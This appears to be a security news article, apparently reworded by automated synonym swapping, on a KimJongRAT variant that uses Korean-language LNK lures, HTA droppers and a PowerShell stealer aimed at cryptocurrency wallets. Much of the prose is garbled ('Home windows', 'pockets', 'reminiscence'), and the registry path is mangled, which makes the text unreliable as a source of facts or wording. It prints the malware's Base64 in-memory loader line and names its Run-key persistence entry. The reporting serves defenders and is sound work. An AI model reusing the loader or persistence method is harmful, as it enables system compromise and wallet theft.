A complicated evolution of the KimJongRAT malware household has emerged, demonstrating superior methods for credential theft and system compromise by way of weaponized Home windows shortcut information and PowerShell-based payloads.
This newest marketing campaign represents a major development from earlier variants, incorporating each Moveable Executable (PE) and PowerShell implementations that particularly goal cryptocurrency pockets extensions and delicate browser knowledge.
The malware’s multi-stage deployment structure leverages reliable content material supply community companies to masks malicious actions, making detection significantly more difficult for conventional safety options.
The assault begins with deceptively named LNK information, similar to “성범죄자 신상정보 고지.pdf.lnk”, suggesting the marketing campaign could also be concentrating on Korean-speaking customers with social engineering ways designed to use public security considerations.
These preliminary information function refined downloaders that set up the muse for a fancy an infection chain involving a number of file sorts and deployment levels.
Palo Alto Networks researchers recognized that this new variant represents a considerable departure from the unique KimJongRAT stealer first documented in 2013, incorporating fashionable evasion methods and expanded concentrating on capabilities.
The malware’s builders have demonstrated outstanding adaptability, constantly updating their instruments to bypass present safety measures whereas increasing their focus to incorporate the profitable cryptocurrency sector.
The analysis reveals two distinct implementation approaches: a conventional PE variant and an revolutionary PowerShell-based model, each designed to maximise knowledge exfiltration whereas sustaining persistence on contaminated programs.
Malware execution chain (Supply – Palo Alto Networks)
The financial implications of this marketing campaign are significantly regarding given the malware’s in depth give attention to cryptocurrency pockets extensions, with the PowerShell variant concentrating on over 40 completely different browser extensions together with MetaMask, Belief Pockets, Exodus Web3 Pockets, and quite a few different common cryptocurrency administration instruments.
This complete concentrating on method suggests the attackers are well-informed concerning the cryptocurrency ecosystem and are positioning themselves to capitalize on the rising adoption of digital property amongst each particular person customers and organizations.
Multi-Stage An infection Mechanism and Payload Deployment
The an infection mechanism employed by this KimJongRAT variant demonstrates refined understanding of Home windows safety structure and consumer habits patterns.
Upon execution, the preliminary LNK file makes use of reliable Home windows utilities together with cmd.exe and curl.exe to obtain an HTA (HTML Software) file from attacker-controlled accounts on cdn.glitch.international, a reliable CDN service.
This method gives a number of benefits for the attackers, together with the power to host malicious content material on trusted infrastructure whereas avoiding direct attribution to their very own servers.
The downloaded HTA file, sometimes named both “pdf.hta” or “sfmw.hta” relying on the variant, incorporates obfuscated VBScript code alongside a number of Base64-encoded payloads embedded inside the file construction.
The PowerShell variant’s HTA file particularly drops two vital elements: a decoy PDF doc designed to take care of the phantasm of reliable content material, and a ZIP archive containing the precise malware elements.
The decoy paperwork usually relate to Korean administrative types, reinforcing the obvious geographic concentrating on of this marketing campaign.
Malware execution chain of the newest PowerShell variant (Supply – Palo Alto Networks)
The ZIP archive extraction reveals a fastidiously orchestrated deployment system comprising 4 distinct information: “1.ps1” (PowerShell loader), “1.log” (Base64-encoded stealer), “1.vbs” (persistence mechanism), and “2.log” (keylogger module).
The PowerShell loader employs a easy but efficient method, using the Invoke-Expression cmdlet to decode and execute the Base64-encoded stealer straight in reminiscence, as demonstrated by the code snippet: iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content material $args)))).
The stealer part implements complete anti-analysis measures, together with VMware detection by way of UUID examination and automated deletion of malicious information when digital machine environments are detected.
The malware establishes persistence by way of Home windows registry modification, creating an entry below “HKCUSoftwareMicrosoftWindowsCurrentVersionRun” with the important thing “WindowsSecurityCheck” that ensures automated execution upon system startup.
This persistence mechanism, mixed with the malware’s capability to function completely by way of reliable system utilities and PowerShell, makes detection by way of conventional signature-based strategies extraordinarily troublesome whereas offering attackers with long-term entry to compromised programs.
Automate risk response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs throughout all endpoints -> Request full entry
